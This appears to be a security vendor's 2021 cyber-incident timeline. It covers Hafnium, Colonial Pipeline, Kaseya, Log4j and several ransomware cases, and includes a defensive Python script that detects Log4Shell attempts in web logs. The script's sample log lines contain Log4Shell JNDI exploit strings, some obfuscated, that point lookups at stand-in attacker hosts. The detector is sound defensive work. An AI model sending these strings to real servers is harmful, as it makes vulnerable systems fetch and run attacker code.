2021 Cybersecurity Events Timeline
How experts responded to critical cybersecurity events
Hafnium/Microsoft Exchange
Jan 6 - Mar 2
On March 2, Microsoft announced that a China-based threat actor it calls “Hafnium,” which Microsoft assesses to be state-sponsored, had been exploiting four previously unknown vulnerabilities in on-premises Exchange Server to attack US organizations. Most zero-day attacks rely on a single flaw; Hafnium chained four, and exploitation of the bugs quickly became widespread. An estimated 250,000 servers were affected globally, including servers operated by some 30,000 US organizations.
Experts Respond
Microsoft Exchange “Hafnium” Hack: Recommended Steps (blog post)
Optiv Flash Panel: Analysis of FBI Response to MS Exchange Hack (on-demand panel)
Oldsmar
Feb 5
On February 5, an attacker remotely accessed the control system of the water treatment plant in Oldsmar, FL, a community outside Tampa. The attack was thwarted when an operator whose job is to monitor water quality noticed the intruder raising the sodium hydroxide (lye) dosing setpoint to a level that could have poisoned up to 15,000 residents, and reversed the change. The attacker got in through a remote access tool that plant employees used routinely.
Experts Respond
Attempted Florida Water Supply Tampering Underscores IoT/OT Security Challenges (blog post)
Colonial Pipeline
May 7
On May 7, Colonial Pipeline, the largest pipeline system for refined petroleum products in the US, suffered a ransomware attack by DarkSide, a ransomware-as-a-service (RaaS) gang. Colonial halted pipeline operations in response, disrupting fuel supply to the East Coast and causing heavy financial losses. The company paid DarkSide approximately $4.4 million in Bitcoin for a decryption tool, a payment first reported on May 13, and restored operations within days.
Experts Respond
Combating Ransomware – Protecting a Nation’s Critical Infrastructure (blog post)
White House Executive Order
May 12
Responding to a series of damaging and highly publicized attacks, including SolarWinds and Colonial Pipeline, the White House issued the Executive Order on Improving the Nation’s Cybersecurity (EO 14028). Its requirements bind federal agencies and flow down to the contractors and software suppliers that sell to the Federal Government.
Experts Respond
Optiv Flash Panel: White House Cybersecurity Executive Order (on-demand panel)
Kaseya
Jul 2
In what a prominent news service called “one of the single largest criminal ransomware sprees in history,” threat actors deploying REvil ransomware exploited vulnerabilities in on-premises deployments of Kaseya’s Virtual System Administrator (VSA) software. Roughly 50 Kaseya customers were hit directly, many of them managed service providers (MSPs), and the attackers used those MSPs’ VSA servers to push the ransomware to as many as 1,500 downstream organizations.
Experts Respond
Optiv Flash Panel: Supply-Chain Attack or Zero-Day Vulnerability? (on-demand panel)
Kaseya Compromise – Immediate Actions Recommended (blog post)
Log4j
Dec 9
On December 9, a critical zero-day vulnerability in the widely used Java logging library Log4j (version 2) was publicly disclosed; it had been reported to Apache by Chen Zhaojun of the Alibaba Cloud Security Team. The flaw lets an unauthenticated attacker achieve remote code execution simply by getting a crafted string logged. Services reported to be exposed included Steam, Apple iCloud and Minecraft.
Experts Respond
Optiv Flash Panel: Zero-Day Apache Log4j2 Vulnerability (on-demand panel)
Apache Log4j2 Resource Hub
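As an added illustration of the check a defender would run against the Log4j entry above (example code written for this page, not Optiv's, Apache's or any vendor's), the following script looks for the trigger string in web server logs. The vulnerability fires when Log4j resolves a "${jndi:...}" lookup inside logged input, and attackers hid that string behind nested lookups such as "${lower:j}" and "${::-j}", so a plain substring match misses much of the traffic. The log lines and IP addresses below are constructed, and the lookup resolution implements only the "lower", "upper" and ":-" default-value forms needed to unwrap those tricks, not Log4j's full lookup engine.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not real traffic; RFC 5737 documentation
# addresses). The first three carry JNDI lookups in progressively obfuscated
# forms; the last two are benign, one of them using an unrelated ${date:...} lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 833 "-" "${${lower:j}${upper:n}di:rmi://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:01 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.4/b}"',
    '10.0.0.2 - - [10/Dec/2021:03:17:40 +0000] "GET /status HTTP/1.1" 200 17 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.3 - - [10/Dec/2021:03:18:12 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 17 "-" "curl/7.79.1"',
]

# Matches the innermost ${...} lookups (no nested braces inside the body).
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The trigger string once obfuscation has been unwrapped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Collapse the lookup forms attackers used to hide the word 'jndi'.

    Assumption: this mirrors only the subset of Log4j lookup syntax needed for
    de-obfuscation (lower, upper and the ':-' default-value form), not the full
    lookup engine. Anything else returns None and is left untouched.
    """
    if ":-" in body:                      # ${x:-j} and ${::-j} both evaluate to "j"
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep:
        if key.lower() == "lower":
            return value.lower()
        if key.lower() == "upper":
            return value.upper()
    return None


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


@dataclass
class Finding:
    source_ip: str
    normalized: str
    raw: str


def find_log4shell_attempts(lines):
    """Return one Finding per log line that contains a JNDI lookup after de-obfuscation."""
    findings = []
    for line in lines:
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            source_ip = line.split(" ", 1)[0]   # assumes combined-log-format lines
            findings.append(Finding(source_ip, normalized, line))
    return findings


if __name__ == "__main__":
    for f in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"{f.source_ip}: {f.normalized}")
```

This is an indicator check, not a fix: other lookup forms and encodings can still slip past it, so treat a hit as a reason to hunt for outbound LDAP or RMI connections from the logging host, and rely on upgrading Log4j to a patched release rather than on log filtering.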
The Optiv Threat Group
Optiv’s Threat Group tracks publicly known cybersecurity incidents and distributes daily client alerts detailing active threats. These alerts include available prevention, patch and remediation advice, and clients can follow up with their Optiv Threat team.
2021 Tracked Threats
CD PROJEKT RED
Feb 8
Gaming studio CD PROJEKT RED, maker of The Witcher 3: Wild Hunt and Cyberpunk 2077, had source code stolen in a ransomware attack; the attackers reportedly sold it to an anonymous buyer.
Acer
Mar 19, Oct 14
Computer manufacturer Acer was hit by multiple cyber attacks. In March, the REvil ransomware gang demanded $50 million for the return of stolen data; in October, the Desorden Group claimed two further intrusions and said it was not demanding a ransom but demonstrating that Acer’s security was still insufficient.
CNA
Mar 21
CNA Financial Corp. was hit by a ransomware attack that may have exposed the personally identifiable information (PII) of roughly 75,000 people. CNA reportedly paid a $40 million ransom to recover its data.
Brenntag
Apr 28
Using stolen credentials, attackers affiliated with the DarkSide gang breached the North America division of Brenntag, a Germany-based company that is one of the world’s largest chemical distributors. The company paid a $4.4 million ransom in Bitcoin to prevent publication of the stolen data.
JBS
May 30
Brazil-based JBS SA, which supplies roughly a fifth of the world’s meat, was hit by a ransomware attack that temporarily shut down all JBS USA operations. The company paid $11 million for the decryption key.
AXA
May
An Asian division of French insurer AXA was attacked by threat actors associated with the Avaddon ransomware-as-a-service (RaaS) group, who claimed to have stolen three terabytes of data including PII. The attack came just days after AXA’s French arm said it would stop reimbursing ransom payments under its cyber insurance policies.
“My administration is continuing to safeguard our critical infrastructure, the majority of which is privately owned and managed, like Colonial Pipeline. Private entities are in charge of their own cybersecurity, and we need — and we have to — we know — we know what they need. They need greater private-sector investment in cybersecurity.”
- President Biden on the Colonial Pipeline Incident